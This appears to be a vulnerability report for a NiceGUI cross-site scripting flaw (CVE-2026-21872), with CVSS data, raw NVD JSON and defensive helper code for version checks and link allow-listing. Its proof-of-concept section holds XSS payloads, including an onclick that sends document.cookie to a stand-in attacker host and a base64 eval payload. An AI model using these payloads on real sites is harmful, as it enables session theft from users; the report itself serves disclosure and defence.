Security Vulnerability Report
CVE-2026-21872 CVSS 6.1 MEDIUM

Published: 2026-01-08 10:15:55
Last Modified: 2026-01-15 17:41:02

Description

NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zauberzeug:nicegui:*:*:*:*:*:*:*:* - VULNERABLE
NiceGUI >= 2.22.0
NiceGUI < 3.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-21872 XSS PoC for NiceGUI ui.sub_pages -->
<!-- Demonstrates the click-triggered XSS in NiceGUI sub_pages: the user must actively click the link -->

<!-- Malicious link payload that triggers XSS when clicked -->
<a href="javascript:alert(document.cookie)">Click me</a>

<!-- Alternative payload using an event handler (generic HTML injection; needs a raw-HTML sink such as ui.html) -->
<a href="#" onclick="fetch('https://attacker.com/steal?c='+document.cookie)">Click here</a>

<!-- HTML injection vector; the base64 decodes to alert('XSS'); -->
<img src=x onerror="eval(atob('YWxlcnQoJ1hTUycpOw=='))">

python
# NiceGUI Python exploit example
from nicegui import ui

# Vulnerable code pattern (affected versions 2.22.0 - 3.4.1): a link whose
# target is attacker-controlled is rendered on a page that uses ui.sub_pages.
# NiceGUI fills the page function's `link` parameter from the ?link= query
# string, so /vulnerable?link=javascript:alert('XSS') renders the payload.

def home() -> None:
    ui.label('sub page content')

@ui.page('/vulnerable')
def vulnerable_page(link: str = '') -> None:
    ui.sub_pages({'/': home})     # installs the click listener that 3.5.0 fixes
    ui.link('Click me', link)      # XSS here: the link target is not validated
    # This allows attackers to inject a target such as:
    #   javascript:alert('XSS')
    # and, where the same input is rendered as raw HTML (e.g. via ui.html), also:
    #   <img src=x onerror=alert('XSS')>

ui.run()
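The advisory has two preconditions: a NiceGUI version in the affected range, and a link target the attacker controls being rendered on a page that uses ui.sub_pages. The following helpers, added here as example code (not NiceGUI project code and not from the advisory), cover both from the defender's side: `is_affected()` checks a version string against the CPE range above (>= 2.22.0, < 3.5.0), and `safe_link_target()` is a generic href allow-list that keeps `javascript:`, `data:` and scheme-relative targets from ever reaching `ui.link`. The allow-list is a mitigation for the second precondition, not a reimplementation of the upstream 3.5.0 fix, which is in the click listener itself. Function names, the 4-tuple version encoding and the sample inputs are this example's own assumptions.

```python
"""Added triage helpers for CVE-2026-21872 (example code, not NiceGUI's).

1. is_affected(): does a NiceGUI version string fall inside the advisory's
   range, >= 2.22.0 and < 3.5.0 (the CPE match on this page)?
2. safe_link_target(): an allow-list for link targets that come from user
   input. Only same-origin paths and absolute http(s) URLs get through, so
   a value such as javascript:alert(1) never becomes the href of an <a>
   that the sub_pages click handler can see. Mitigation only; the real fix
   is upgrading to 3.5.0.
"""
from typing import Optional, Sequence
from urllib.parse import urlsplit


def parse_version(text: str) -> tuple:
    """Turn '3.4.1', 'v3.5', '3.5.0rc1' or '3.5.0.dev1' into a comparable
    4-tuple (major, minor, patch, pre) where pre is -1 for a pre-release
    and 0 for a final release, so that 3.5.0rc1 sorts before 3.5.0."""
    numbers = []
    pre_release = 0
    for piece in text.strip().lstrip('vV').split('.'):
        digits = ''
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            if not numbers:
                raise ValueError(f'unparseable version: {text!r}')
            pre_release = -1          # e.g. the 'dev1' in '3.5.0.dev1'
            break
        numbers.append(int(digits))
        if len(digits) != len(piece):
            pre_release = -1          # e.g. the 'rc1' in '3.5.0rc1'
            break
    numbers = (numbers + [0, 0, 0])[:3]
    return (numbers[0], numbers[1], numbers[2], pre_release)


AFFECTED_START = parse_version('2.22.0')   # versionStartIncluding
FIXED_VERSION = parse_version('3.5.0')     # versionEndExcluding


def is_affected(version: str) -> bool:
    """True if `version` is inside [2.22.0, 3.5.0). A pre-release of 3.5.0
    is reported as affected, because the fix is only known to ship in 3.5.0."""
    return AFFECTED_START <= parse_version(version) < FIXED_VERSION


_C0_AND_SPACE = ''.join(chr(c) for c in range(0x21))


def safe_link_target(raw: str, allowed_hosts: Sequence[str] = ()) -> Optional[str]:
    """Return `raw` if it is acceptable as an <a href>, else None.

    Accepted: a same-origin path starting with a single '/', or an absolute
    http/https URL with a host (restricted to `allowed_hosts` when given).
    Rejected: every other scheme (javascript:, data:, vbscript:, ...),
    scheme-relative '//host', backslash variants, and control characters.
    """
    if not isinstance(raw, str):
        return None
    # Mirror browser URL pre-processing: leading/trailing C0 controls and
    # spaces are stripped and internal tab/CR/LF are removed, so that
    # ' java\tscript:alert(1)' is recognised as the javascript scheme.
    cleaned = raw.strip(_C0_AND_SPACE)
    for ch in '\t\r\n':
        cleaned = cleaned.replace(ch, '')
    if not cleaned or any(ord(ch) < 0x20 for ch in cleaned):
        return None
    try:
        parts = urlsplit(cleaned)
    except ValueError:            # e.g. an unbalanced IPv6 bracket
        return None
    if parts.scheme:
        if parts.scheme.lower() not in ('http', 'https'):
            return None
        host = parts.hostname
        if not host:
            return None
        if allowed_hosts and host.lower() not in [h.lower() for h in allowed_hosts]:
            return None
        return cleaned
    # No scheme: accept only an explicit same-origin path. '//host' and
    # '\\host' become scheme-relative once a browser normalises them.
    if cleaned[0] == '\\' or cleaned.startswith(('//', '/\\')):
        return None
    if not cleaned.startswith('/'):
        return None
    return cleaned


if __name__ == '__main__':
    # Constructed inputs for a quick demonstration.
    for version in ['2.21.9', '2.22.0', '3.4.1', '3.5.0rc1', '3.5.0']:
        print(f'NiceGUI {version:9} affected: {is_affected(version)}')
    for candidate in ['/dashboard?tab=1', 'https://example.com/page',
                      'javascript:alert(document.cookie)', ' java\tscript:alert(1)',
                      '//evil.example/x', 'data:text/html,<script>alert(1)</script>']:
        print(f'{candidate!r:48} -> {safe_link_target(candidate)!r}')
```

In a NiceGUI page you would call `ui.link(text, target)` only when `safe_link_target(user_value)` returns a string, and render a plain label (or nothing) otherwise; the allow-list deliberately rejects bare relative paths such as `page` so that a reviewer can see at a glance that every accepted target is either rooted in the app or an explicit http(s) URL.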

References

https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 (Release Notes)
https://github.com/zauberzeug/nicegui/security/advisories/GHSA-m7j5-rq9j-6jj9 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21872", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:55.470", "lastModified": "2026-01-15T17:41:02.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0."}, {"lang": "es", "value": "NiceGUI es un framework de interfaz de usuario (UI) basado en Python. Desde las versiones 2.22.0 hasta la 3.4.1, una implementación insegura en el oyente de eventos de clic utilizado por ui.sub_pages, combinada con la renderización de enlaces controlada por el atacante en la página, causa XSS cuando el usuario hace clic activamente en el enlace. Este problema ha sido parcheado en la versión 3.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zauberzeug:nicegui:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.22.0", "versionEndExcluding": "3.5.0", "matchCriteriaId": "37903F79-6269-4F0A-939A-36F3E3CC41B3"}]}]}], "references": [{"url": "https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-m7j5-rq9j-6jj9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}